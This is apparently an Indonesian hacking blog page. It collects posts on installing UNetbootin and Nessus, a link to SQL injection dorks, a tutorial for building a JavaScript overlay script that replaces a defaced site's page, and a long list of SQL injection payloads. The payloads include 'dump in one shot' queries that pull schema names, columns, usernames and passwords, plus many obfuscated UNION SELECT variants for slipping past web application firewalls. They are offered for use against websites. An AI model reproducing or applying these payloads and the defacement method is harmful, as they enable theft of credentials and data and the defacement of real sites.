LNX#

Saturday, January 19, 2019

Cara Install Unetbotin di Linux






hello geas kali ini gue mau memberikan tutorial cara install Unetbootin di linux apa itu Unetbootin? UNetbootin (Universal Netboot Installer) adalah perangkat untuk membuat sistem Live USB. Perangkat yang cross-platform ini (dapat digunakan dalam berbagai sistem operasi) dapat memuat berbagai macam perangkat sistem (system utilities) atau meng-install berbagai distro Linux maupun sistem operasi lain meski tanpa CD
 ok Langsung saja ke Tutorialnya:

~pertama masuk ke Terminal dan ketik:

$ sudo add-apt-repository ppa:gezakovacs/ppa

 You are about to add the following PPA:
 UNetbootin http://unetbootin.github.io/ is a cross-platform utility that can create Live USB systems and can load a variety of system utilities or install various Linux distributions and other operating systems without a CD.

Homepage: http://unetbootin.github.io/
Wiki: http://unetbootin.wiki.sourceforge.net/
Downloads: http://sourceforge.net/project/showfiles.php?group_id=222386
Sourceforge: http://sourceforge.net/projects/unetbootin
Launchpad: http://launchpad.net/unetbootin
 More info: https://launchpad.net/~gezakovacs/+archive/ubuntu/ppa
Press Enter to continue or Ctrl+C to cancel

Executing: /tmp/apt-key-gpghome.dFBP01dEmB/gpg.1.sh --keyserver keyserver.ubuntu.com --recv-keys BCCCC1E2835433FA7DB85D51D45DF2E8FC91AE7E
gpg: key D45DF2E8FC91AE7E: public key "Launchpad PPA for Geza Kovacs" imported
gpg: Total number processed: 1
gpg:               imported: 1




nanti akan muncul tulisan seperti itu gan
lanjutkan ketik:

$ sudo apt-get update

$ sudo apt-get install unetbootin

Biar gak error nanti saat pas di buka install extlinux


$ sudo apt-get install extlinux

untuk menjalankan unetbootin ketik:

$ sudo unetbootin

Ok geass sekian dulu byee!!.. 




Saturday, January 12, 2019

Dork fresh SQLI 2019




Assalamualaikum Wr.wb
Oke pada postingan saya kali ini saya akan berbagi dork sqli fresh ea :v
langsung ae comod di bawah ini ..

https://pastebin.com/raw/cvfCeJHE

Cara Install Nessus

Hallo geass kembali lagi di blog kami kali ini gue akan memberikan tutorial cara install Tools nessus.

Bagi anda yang belum tau apa itu nessus gue akan jelaskan sedikit tentang nessus;

Bagi pengguna teknologi IT umum ataupun orang awam ya seperti gue lah hehe mungkin masih asing mendengar nama software yg bernama nessus. karena memang software ini hanya friendly dan di pakai oleh orang-orang IT yang berkecimpung di dunia keamanan jaringan dan komputer khususnya administrator jaringan,kelompok hacker dan perusahaan keamanan Lalu apa itu nessus? Nessus merupakan remote security scanning tool yang di gunakan secara otomatis dalam masalah keamanan khususnya untuk menemukan kerentanan-kerentanan yang memungkinkan seorang hacker mendapatkan akses pada suatu host yang terkoneksi pada suatu jaringan.

langsung saja ke tutorialnya :)

     1.download dulu nessus.dep klik disini
     
     2.kalau sudah download masuk ke terminal
      dan ketik: sudo dpkg -i Nessus-8.1.2-ubuntu1110_amd64.deb

   3.kalau sudah seperti gambar di atas lanjut ketik:
      sudo /etc/init.d/nessusd start

    
    4.kalau sudah masuk ke browser dan masukan link yg ada di tahap pertama tadi seperti ini https://3xploit:8834/

  DONE kalau sudah seperti itu sudah berhasil gann ohh ya nanti tampilan awal di suruh login kalau belum punya akun bisa daftar dulu gan di sini https://www.tenable.com/products/nessus-home


OK mungkin segitu dulu sampai bertemu lagi lain waktu byee:)

Friday, January 11, 2019

Cara Membuat Script JSO





CARA MEMBUAT SCRIPT JSO

Assalamualaikum Wr.wb.

kali ini saya akan membuat tutorial tentang membuat script js overay (JSO) .


Langkah -langkah :

1. Pertama buka web di bawah ini 
http://jdstiles.com/java/cct.html





2. Masukan script deface kalian di web designs, kemudian klik charcodeat()







3. Lalu copy hasil Hexa Decimal (yang di bagian kanan), paste di sini
document.documentElement.innerHTML=String.fromCharCode(Code Char Disini )




4. Copy script kalian dan paste kan di 

5. Save denan nama file terserah




6. Klik raw (sebelah menu download), kemudian copy link tersebut

7. Paste kan link pastebin kalian di sini 

<script type="text/javascript" src="link pastebin kalian"/></script>

Oke, cukup sekian tutorial dari saya , jika masi bingung silahkan comment di bawah yaa :V

BYPASS WAFF


Kumpulan Dios 

BASIC DIOS 1 :
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name))))x) 

BASIC DIOS 2 :
concat(@c:=0x00,if((select count(*) from *information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c) 

DIOS + WAF 1 :
concat%0b(@c:=0x00,if((select count(*) from /*!50000information_schema*/.columns /*!50000where*/ table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c) 

DIOS + WAF 2 :
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) 


Dios 3

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)



Dump

(select(@x)from(select(@x:=0x00),(select(@x)from(as_user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x) 


Macam Macam Bypass Waff

/*!ORDER*/ BY 1
/*!ORDER/**/BY*/ 1
/*!50000ORDER*/ BY 1
/*!50000ORDER BY*/ 1
 /**_**/ORDER/**_**/ /**_**/BY/**_**/  1
/**//**_**/ORDER/**_**//**/ /**//**_**/BY/**_**/ /**/ 1
 /**/OR/**/DER BY  1
 ORDER BY 1
 ORDER BY 1
%0AORDER%0A %0ABY%0A  1
 ORDER BY  (1)--

[#] Bypass Concat() [#]
/*!concat*/()
/*!50000concat*/()
/**//concat/**/()
/**/con/**/cat/**/()
concat/**_**/()
/**_**/concat/**_**/()
concat()
concat()
concat()
%0Aconcat()
concat%0A()
%0Aconcat%0A()

[#] Bypass Group_concat() [#]
/*!Group_concat*/()
/*!50000group_concat*/()
/**//group_concat/**/()
/**/Gro/**/up_con/**/cat/**/()
group_concat/**_**/()
/**_**/group_concat/**_**/()
group_concat()
group_concat()
group_concat()
%0Agroup_concat()
group_concat%0A()
%0Agroup_concat%0A()
[#] Bypass version() [#]
/*!version*/()
/*!50000version*/()
/**//version/**/()
/**/ver/**/sion/**/()
version/**_**/()
/**_**/version/**_**/()
version()
version()
version()
%0Aversion()
version%0A()
%0Aversion%0A()

[#]Bypass database()[#]
/*!database*/()
/*!50000database*/()
/**//database/**/()
/**/data/**/base/**/()
database/**_**/()
/**_**/database/**_**/()
database()
database()
database()
%0Adatabase()
database%0A()
%0Adatabase%0A()

[#]Bypass user()[#]
/*!user*/()
/*!50000user*/()
/**//user/**/()
/**/us/**/er/**/()
user/**_**/()
/**_**/user/**_**/()
user()
user()
user()
%0Auser()
user%0A()
%0Auser%0A()

[#]Bypass from [#]
/*!from*/
/*!50000from*/
from
from
%0Afrom
from%0A
%0Afrom%0A
%0ATWA%0Afrom%0ATWA%0A

[#]Bypass information_schema.columns [#] 
/*!information_schema.columns*/
/*!information_schema*/.columns
/*!50000information_schema*/.columns
/*!50000information_schema.columns*/
/**_**/information_schema/**_**/.columns
/**/information_schema/**/.columns
/**/information_sch/**/ema/**/.columns
information_sch/**/ema.columns
information_schema.columns
%0Ainformation_schema.columns

[#]Bypass union select [#] 
/*!%55NiOn*/ /*!%53eLEct*/

 %55nion(%53elect 1,2,3)-- -

 +union+distinct+select+

 +union+distinctROW+select+

 /**//*!12345UNION SELECT*//**/

 /**//*!50000UNION SELECT*//**/

 /**/UNION/**//*!50000SELECT*//**/

 /*!50000UniON SeLeCt*/

 union /*!50000%53elect*/

 +#uNiOn+#sEleCt

 +#1q%0AuNiOn all#qa%0A#%0AsEleCt

 /*!%55NiOn*/ /*!%53eLEct*/

 /*!u%6eion*/ /*!se%6cect*/

 +un/**/ion+se/**/lect

 uni%0bon+se%0blect

 %2f**%2funion%2f**%2fselect

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 REVERSE(noinu)+REVERSE(tceles)

 /*--*/union/*--*/select/*--*/

 union (/*!/**/ SeleCT */ 1,2,3)

 /*!union*/+/*!select*/

 union+/*!select*/

 /**/union/**/select/**/

 /**/uNIon/**/sEleCt/**/

 /**//*!union*//**//*!select*//**/

 /*!uNIOn*/ /*!SelECt*/

 +union+distinct+select+

 +union+distinctROW+select+

 +UnIOn%0d%0aSeleCt%0d%0a

 UNION/*&test=1*/SELECT/*&pwn=2*/

 un?+un/**/ion+se/**/lect+

 +UNunionION+SEselectLECT+

 +uni%0bon+se%0blect+

 %252f%252a*/union%252f%252a /select%252f%252a*/

 /%2A%2A/union/%2A%2A/select/%2A%2A/

 %2f**%2funion%2f**%2fselect%2f**%2f

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 /*!UnIoN*/SeLecT+